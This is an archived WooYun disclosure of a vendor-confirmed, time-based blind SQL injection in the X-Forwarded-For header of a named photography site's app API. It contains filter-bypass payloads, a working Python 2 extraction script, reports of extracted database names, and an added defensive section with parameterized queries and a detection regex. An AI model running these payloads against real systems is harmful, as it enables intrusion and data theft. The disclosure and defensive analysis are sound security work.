WooYun (WooYun.org) historical vulnerability archive --- http://wy.zone.ci/
WooYun Drops articles, online reader ------------------ http://drop.zone.ci/
2015-11-12: Details sent to the vendor, awaiting the vendor's handling
2015-11-12: Vendor has confirmed; details disclosed to the vendor only
2015-11-22: Details disclosed to core white hats and experts in the relevant field
2015-12-02: Details disclosed to regular white hats
2015-12-12: Details disclosed to intern white hats
2015-12-27: Details disclosed to the public
Asking for advice: an SQLMap tamper to bypass a filter on IF
Target: the official Fengniao app (api.fengniao.com). Testing found a SQL injection vulnerability at the following location: the X-Forwarded-For request header (time-based blind injection).
GET http://api.fengniao.com/app_ipad/news_list.php HTTP/1.1
Accept-Encoding: gzip,deflate
X-Forwarded-For: 1
Connection: close
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Host: api.fengniao.com
Because the site filters certain characters and keywords (spaces, commas, IF and so on), SQLMap could not exploit it, so once again a Python script had to be written. The payload was first worked out by hand as follows: spaces are replaced with /**/ and IF is replaced with CASE WHEN:
'/**/AND/**/(SELECT/**/*/**/FROM/**/(SELECT(SLEEP(CASE/**/WHEN/**/1=1/**/THEN/**/3/**/else/**/0/**/END)))nKfJ)/**/AND/**/'zyYm'='zyYm
So all that is needed is to replace 1=1 with the query to be tested. The verification script is attached (it extracts the current database name as the example; change the proxy address in the script before testing):
#!/usr/bin/env python
#coding=utf8
# Python 2 script. Each request is sent through a local proxy (192.168.222.202:8080);
# a response slower than 3 seconds means the injected CASE WHEN condition was true.
import httplib, urllib, re, time

database = ''        # characters of the database name recovered so far
temp_database = ''   # the same characters as a hex string for the LIKE 0x... prefix match
httpClient = None
count = 0            # 1 = a slow response was seen once and is being re-checked
i = 33               # candidate character, printable ASCII 33..127
while i < 128:
    if i == 37:
        # skip '%', which is a LIKE wildcard and would always match
        i = i+1
    try:
        headers = {"Host": "api.fengniao.com",
                   "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0",
                   "Accept-Encoding": "gzip,deflate",
                   "X-Forwarded-For": "'/**/AND/**/(SELECT/**/*/**/FROM/**/(SELECT(SLEEP(CASE/**/WHEN/**/(database()/**/like/**/0x"+temp_database+str(hex(i))[2:]+"25)/**/THEN/**/3/**/else/**/0/**/END)))nKfJ)/**/AND/**/'zyYm'='zyYm",
                   "Accept": "*/*",
                   "Connection": "close"}
        httpClient = httplib.HTTPConnection("192.168.222.202", 8080, timeout=30)
        url = 'http://api.fengniao.com/app_ipad/news_list.php'
        httpClient.request("GET", url=url, headers=headers)
        st = time.time()
        response = httpClient.getresponse()
        rp = response.read()
        if count == 1:
            # second, confirming measurement for the same candidate character
            if time.time()-st > 3:
                temp_database = temp_database + str(hex(i))[2:]
                database = database + chr(i)
                print 'database(): ', database
                i = 33       # start over for the next character position
                count = 0
            else:
                count = 0
        elif time.time()-st > 3:
            # first slow response: step back one and re-test the same character
            count = 1
            i = i-1
        i=i+1
    except Exception, e:
        print e
    finally:
        if httpClient:
            httpClient.close()
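The report's root cause is that the header value reaches the query as text and the only protection is a character/keyword blocklist, which the /**/ and CASE WHEN substitutions walk straight past. The following Python 3 example, added here and not part of the original report or of the vendor's code, puts the blocklist approach the report describes beside the two controls that actually close this class of bug: parsing X-Forwarded-For as an IP address (allow-list validation) and storing the raw header through a parameterized query. It also includes a small pattern check a log or WAF rule can use to flag comment-based whitespace and timing functions in a header. The table layout, the sample "legit" header and the blocklist tokens are assumptions constructed for the demo; the payload string is the one from the report.

```python
import ipaddress
import re
import sqlite3

# Payload from the report, used here as a test input: spaces -> /**/, IF -> CASE WHEN.
REPORT_PAYLOAD = ("'/**/AND/**/(SELECT/**/*/**/FROM/**/(SELECT(SLEEP(CASE/**/WHEN/**/1=1"
                  "/**/THEN/**/3/**/else/**/0/**/END)))nKfJ)/**/AND/**/'zyYm'='zyYm")

# Assumed blocklist modelled on the filter the report describes (space, comma, IF).
BLOCKED_TOKENS = (" ", ",", "if")


def blocklist_filter_accepts(value):
    """Blocklist check: True when the value contains none of the blocked tokens.
    This is the weak control; the report's payload satisfies it."""
    lowered = value.lower()
    return not any(tok in lowered for tok in BLOCKED_TOKENS)


def parse_client_ip(xff_header):
    """Allow-list validation: take the first hop of X-Forwarded-For and require it
    to parse as an IP address. Returns the canonical address or None if rejected."""
    first_hop = xff_header.split(",", 1)[0].strip()
    try:
        return str(ipaddress.ip_address(first_hop))
    except ValueError:
        return None


# Detection pattern: SQL comments used as whitespace, timing functions, CASE ... WHEN.
SUSPICIOUS = re.compile(
    r"/\*.*?\*/|\bsleep\s*\(|\bbenchmark\s*\(|\bcase\b.*\bwhen\b", re.IGNORECASE)


def flag_header(value):
    """True when a header value looks like an injection attempt worth alerting on."""
    return bool(SUSPICIOUS.search(value))


def record_request(conn, xff_value, path):
    """Store the raw header through a parameterized INSERT: the value is bound as
    data, so it cannot change the statement no matter what it contains."""
    conn.execute(
        "INSERT INTO access_log (client_ip, raw_xff, path) VALUES (?, ?, ?)",
        (parse_client_ip(xff_value), xff_value, path),
    )
    conn.commit()


def demo():
    """Run both inputs through the three controls; returns a dict of outcomes."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE access_log (client_ip TEXT, raw_xff TEXT, path TEXT)")
    samples = {
        "legit": "203.0.113.7, 10.0.0.2",   # constructed two-hop XFF value
        "payload": REPORT_PAYLOAD,
    }
    results = {}
    for name, value in samples.items():
        record_request(conn, value, "/app_ipad/news_list.php")
        results[name] = {
            "blocklist_accepts": blocklist_filter_accepts(value),
            "client_ip": parse_client_ip(value),
            "flagged": flag_header(value),
        }
    results["rows_stored"] = conn.execute("SELECT COUNT(*) FROM access_log").fetchone()[0]
    return results


if __name__ == "__main__":
    for key, val in demo().items():
        print(key, val)
```

Running demo() shows the asymmetry: the blocklist lets the report's payload through while rejecting the perfectly normal two-hop value (a comma and a space are legitimate in X-Forwarded-For), whereas IP parsing accepts the normal value and rejects the payload, and the parameterized INSERT stores both rows as plain text. The regex is a detection aid for logs, not a replacement for the other two controls.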
1. Extracted the current database user.
2. Extracted the current database name.
3. Extracted all database names; there are 67 in total. The payload used to confirm the count:
'/**/AND/**/(SELECT/**/*/**/FROM/**/(SELECT(SLEEP(CASE/**/WHEN/**/((select/**/count(*)/**/from/**/information_schema.SCHEMATA)=67)/**/THEN/**/3/**/else/**/0/**/END)))nKfJ)/**/AND/**/'zyYm'='zyYm
That is too many, so only the first few were extracted.
4. Extracted the table names of the current database; only the first two were extracted, as verification.
Advice welcome.
Severity: Medium
Vulnerability Rank: 10
Confirmed: 2015-11-12 18:46
Thank you very much
None yet